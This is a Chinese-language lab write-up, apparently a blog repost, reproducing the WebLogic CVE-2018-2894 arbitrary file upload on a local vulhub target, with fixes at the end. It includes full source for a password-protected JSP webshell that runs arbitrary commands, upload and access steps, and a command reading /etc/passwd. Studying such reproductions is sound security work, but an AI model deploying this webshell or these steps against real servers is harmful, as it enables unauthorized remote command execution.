目錄
- 0x01 漏洞介紹
- 0x02 環境部署:
- 0x03 漏洞復現
- 1.開啟運行靶機
- 2. 開啟Web Service Test Page
- 3. 訪問url, 設定Work Home Dir
- 4. 上傳木馬
- 5. 訪問上傳的木馬檔案,執行命令
- 0x04 漏洞修復
0x01 漏洞介紹
-
漏洞描述
Weblogic Web Service Test Page中一處任意檔案上傳漏洞,Web Service Test Page 在"生產模式"下默認不開啟,所以該漏洞有一定限制, -
漏洞編號
CVE-2018-2894 -
受影響版本
12.1.3.0, 12.2.1.2, 12.2.1.3
0x02 環境部署:
搭建一次,復現百次
靶機 ip:192.168.30.209
kali ip:192.168.30.182
0x03 漏洞復現
1.開啟運行靶機
#進入需要開啟的環境
┌──(root💀kali)-[~/vulhub/weblogic]
└─# cd CVE-2018-2894
#對靶場進行編譯
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker-compose build
#運行此靶場
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker-compose up -d
#查看當前運行的靶場
┌──(root💀kali)-[~/vulhub/weblogic/CVE-2018-2894]
└─# docker ps

2. 開啟Web Service Test Page
由于含有檔案上傳漏洞的網頁在生產模式下默認關閉,所以我們需要提前手動開啟
2.1 查看管理員
docker-compose logs | grep password
#用戶名:weblogic 密碼:odJij4nC

2.2 訪問rul登錄后臺
http://192.168.30.209:7001/console/login/LoginForm.jsp

2.3 啟用web服務測驗頁并保存




3. 訪問url, 設定Work Home Dir
http://192.168.30.209:7001/ws_utc/config.do
#將Work Home Dir設定如下,因為訪問這個目錄無需權限
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4. 上傳木馬
#jspexec.jsp jsp有回顯帶密碼驗證的,這里腳本的密碼為666
#訪問時url格式如下
#http://127.0.0.1/jspexec.jsp?pwd=666&i=ls
<%
if("666".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>

由于服務器對上傳的檔案名具有重寫操作,將檔案名重寫為:[時間戳]_[檔案名],所以我們需要在上傳檔案的回包中查看時間戳

所以我們上傳后的木馬檔案名已經被重命名為 1631517951174_jspexec.jsp
5. 訪問上傳的木馬檔案,執行命令
http://192.168.30.209:7001/ws_utc/css/config/keystore/[時間戳]_[檔案名]
http://192.168.30.209:7001/ws_utc/css/config/keystore/1631517951174_jspexec.jsp?pwd=666&i=cat /etc/passwd

漏洞復現成功
0x04 漏洞修復
- 開啟生產模式
- 設定config.do,begin.do頁面登錄授權后訪問
- IPS等防御產品可以加入相應的特征
- 升級到官方的最新版本
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/300184.html
標籤:其他
下一篇:2021羊城杯CTF wp
